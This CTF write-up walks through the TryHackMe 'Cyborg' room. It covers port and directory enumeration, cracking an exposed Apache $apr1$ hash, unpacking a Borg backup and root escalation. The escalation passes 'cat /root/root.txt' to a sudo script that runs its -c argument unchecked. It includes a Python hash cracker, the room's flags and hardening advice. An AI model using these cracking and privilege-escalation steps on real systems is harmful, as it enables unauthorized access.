TryHackMe | Cyborg writeup

Ricardo Ribas
4 min read · Feb 3, 2023


This is one (of many) walkthroughs for the TryHackMe Cyborg CTF room. As always, I follow a few simple enumeration steps and point out the flaw behind each one as this article goes along.

Enumeration

As usual, I use nmap to see which ports are open, with default scripts and service detection over the full TCP range (the output below reports 65533 closed ports, so all 65535 were scanned, not only nmap's default top 1000):

nmap -sC -sV -p- $IP_ADDRESS

Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-25 03:02 EST
Nmap scan report for 10.10.163.193
Host is up (0.065s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.39 seconds

From this command, you can answer the first two questions.

  1. Scan the machine, how many ports are open? 2
  2. What service is running on port 22? ssh

Furthermore, browsing to the web server on port 80 shows a web page (the Apache default page). Even though that page carries no useful information, it answers the next question.

3. What service is running on port 80? http (Apache HTTP server)

Reviewing the HTML source and the request/response headers turned up nothing to work with, so I used gobuster to brute-force URIs:

gobuster dir -u http://10.10.187.217 \
  -x html,txt,js,py,php \
  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt


===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.187.217
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: js,py,php,html,txt
[+] Timeout: 10s
===============================================================
2023/01/11 14:29:41 Starting gobuster
===============================================================
(...)
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
===============================================================
2023/01/11 14:29:44 Finished
===============================================================

From the output, two paths stood out: admin and etc.

  1. /admin — a website about a musician.
  2. /etc/ — a directory listing that should never be reachable from the web; it held a couple of folders and files, and /etc/squid/passwd looked like a Squid proxy basic-auth password file (htpasswd-style user:hash entries), i.e. credentials for something. 🤔

My curiosity aroused, I looked for a hash format I could crack those credentials with. The hashcat example-hashes page identifies the $apr1$ prefix as Apache APR MD5 (md5apr1), mode 1600.

I used that mode to crack the hash. The hash must be single-quoted, otherwise the shell tries to expand $apr1 as a variable; and hashcat wants only the hash part, without the user: prefix from the passwd line:

hashcat -a 0 -m 1600 '$apr1$rest-of-the-hash' /usr/share/wordlists/rockyou.txt

After a few seconds the password was cracked. But where should it be used? There was still a missing piece waiting to be explored: the admin page!
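To show what hashcat mode 1600 actually computes, here is an added example of mine (not code from the original writeup or from the room): a pure-Python implementation of the Apache/APR $apr1$ scheme, a verifier, and a small dictionary attack on a constructed user:hash line of the kind found in the squid passwd file. The username, the salt CTFsalt1, the password and the wordlist are all constructed for the example; only the algorithm is the real thing.

```python
"""Apache/APR $apr1$ hashing (hashcat mode 1600) with a small dictionary attack.

Added example for this writeup, not a file from the room: the passwd line, its
salt and the wordlist below are constructed. The algorithm is the md5crypt
variant that `htpasswd -m`, Squid's basic-auth helper and hashcat -m 1600 share.
"""
import hashlib
import hmac
import re
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"
_APR1_RE = re.compile(r"^\$apr1\$([./0-9A-Za-z]{1,8})\$([./0-9A-Za-z]{22})$")


def _to64(value: int, count: int) -> str:
    """crypt(3)-style encoding: `count` 6-bit groups, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """Return '$apr1$<salt>$<22 chars>', as Apache's apr_md5_encode() does."""
    pw = password.encode()
    salt = salt[:8]                      # APR uses at most 8 salt characters
    sb = salt.encode()

    ctx = hashlib.md5(pw + MAGIC + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for n in range(len(pw), 0, -16):     # len(pw) bytes of the alternate digest
        ctx.update(alt[: min(16, n)])
    n = len(pw)
    while n:                             # one byte per bit of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()

    # 1000 stretching rounds of plain MD5: cheap enough that a GPU tries
    # millions of rockyou.txt candidates per second against one hash.
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$apr1${salt}${encoded}"


def verify_apr1(password: str, stored: str) -> bool:
    """Check a candidate against a stored hash: reuse its salt, compare in constant time."""
    m = _APR1_RE.match(stored)
    if not m:
        raise ValueError("not an $apr1$ hash")
    return hmac.compare_digest(apr1_md5(password, m.group(1)), stored)


def crack_htpasswd_line(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one 'user:$apr1$...' line (what hashcat -a 0 -m 1600 does)."""
    _user, _, stored = line.strip().partition(":")
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if verify_apr1(candidate, stored):
            return candidate
    return None


# Constructed sample: a squid/htpasswd-style line whose salt and password are chosen here.
SAMPLE_LINE = "proxyuser:" + apr1_md5("squidward", "CTFsalt1")
SAMPLE_WORDLIST = ["123456", "password", "letmein", "squidward", "qwerty"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_htpasswd_line(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The hash printed for the constructed line can be cross-checked with `openssl passwd -apr1 -salt CTFsalt1 squidward`, which emits the same string. The scheme is 1000 rounds of MD5 with an 8-character salt and no memory hardness, which is why rockyou.txt gets through it in seconds on a GPU; that, rather than the odd location of the file, is the lesson of the exposed passwd.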

Running gobuster against the admin page turned up nothing important except admin/admin.html. Judging by that page's content, someone had messed up 😂, and the phrase “music_archive” appeared again, so it was probably significant. In the HTML source I found a reference to an archive.tar file. After downloading and unpacking it, there were some files and folders under home/field/dev/final_archive.

My first step on this folder was to check the README file.

This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

My first impression was “what the hell is borgbackup?”. A quick Google search showed that it is a deduplicating backup program. After several minutes in the documentation and some experimentation, it became clear that the archives inside a repository can be listed by name and then extracted:

borg extract $TAR_CONTENT_PWD/home/field/dev/final_archive/::music_archive

Surprisingly, borg asked me for a passphrase 😄 (the repository is encrypted; the passphrase can also be supplied through the BORG_PASSPHRASE environment variable). The cracked password worked, and the command extracted some folders, one of them a home directory for the user alex.

Whoop! Whoop! I found a very interesting file inside Documents with more credentials. Maybe that was the entry point to reach the server over SSH.

ssh alex@$IP_ADDRESS

alex@IP_ADDRESS's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.

alex@ubuntu:~$

At this point I could access the first flag.

4. What is the user.txt flag? flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

Privilege escalation

The rest of the CTF introduced some new challenges. The first thing to do was to list the commands alex is allowed to run through sudo.

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

One script stood out in the output. Reading it, I noticed that it parsed a command-line argument (-c) and executed its value, unvalidated, at the very end of the script:

...
# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

Because the script runs as root under sudo, I could simply have it print /root/root.txt. Choosing that path was pure intuition (it is the usual place for the root flag); there was no particular reason for it.

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"

5. What is the root.txt flag? flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
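The same root-for-free mechanism, as an added example of mine rather than the room's script: backup.sh is a bash wrapper, but the pattern is restated here in Python so that it runs stand-alone without sudo. vulnerable_backup mirrors cmd=$($command) by handing the -c value to a shell; hardened_backup maps -c onto a fixed allowlist and never spawns a shell. The action name and the command in the allowlist are assumptions for illustration.

```python
"""The backup.sh privilege-escalation pattern, restated in Python.

Added example for this writeup, not the room's /etc/mp3backups/backup.sh: a
constructed wrapper showing why a sudo NOPASSWD script that executes whatever
"-c" receives is root command execution, next to a hardened equivalent.
"""
import argparse
import subprocess

# Constructed allowlist for the hardened variant: the only argv vectors the
# tool may ever run. The action name is an assumption for illustration.
ALLOWED_ACTIONS = {
    "status": ["echo", "Backup finished"],
}


def vulnerable_backup(argv):
    """Mirrors `cmd=$($command)`: the -c value is handed to a shell unchanged.

    Invoked through sudo this runs as root, so -c "cat /root/root.txt" is
    enough; nothing else the script does matters.
    """
    parser = argparse.ArgumentParser(prog="backup.sh")
    parser.add_argument("-c", dest="command", default="")
    args = parser.parse_args(argv)
    result = subprocess.run(args.command, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def hardened_backup(argv):
    """Treats -c as a key into an allowlist, never as a command.

    No shell is spawned (a fixed argv list, shell=False), so metacharacters in
    the argument have nothing to inject into, and unknown actions are rejected
    before anything runs.
    """
    if len(argv) != 2 or argv[0] != "-c":
        raise ValueError("usage: -c <action>")
    action = argv[1]
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"action not permitted: {action!r}")
    result = subprocess.run(ALLOWED_ACTIONS[action], capture_output=True, text=True)
    return result.stdout.strip()


def rejects(argv) -> bool:
    """True if the hardened wrapper refuses this argv (used by the demo below)."""
    try:
        hardened_backup(argv)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # echo stands in for `cat /root/root.txt`; without sudo it proves the point harmlessly.
    print("vulnerable:", vulnerable_backup(["-c", "echo root.txt would be printed here"]))
    print("hardened  :", hardened_backup(["-c", "status"]))
    print("rejected  :", rejects(["-c", "cat /root/root.txt"]))
```

Two further fixes belong on the sudo side, because the script's ownership and the sudoers rule are what turn this bug into root: the script must be root-owned and not writable by alex, and if it needs no arguments at all, the sudoers entry can forbid them with two empty quotes (/etc/mp3backups/backup.sh ""), which sudo interprets as "may only be run without arguments".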

Conclusion

Although this CTF is rated easy, my lack of knowledge in several topics kept me from finishing it more smoothly and quickly; it took some research on my own to make it happen. Several files also led me in the wrong direction (the .bash_history file, for instance, but also the .dbus and .config files). Kudos to fieldraccoon for creating this one! 👍


Written by Ricardo Ribas

Software Engineer passionate about rock climbing, yoga, gaming and travelling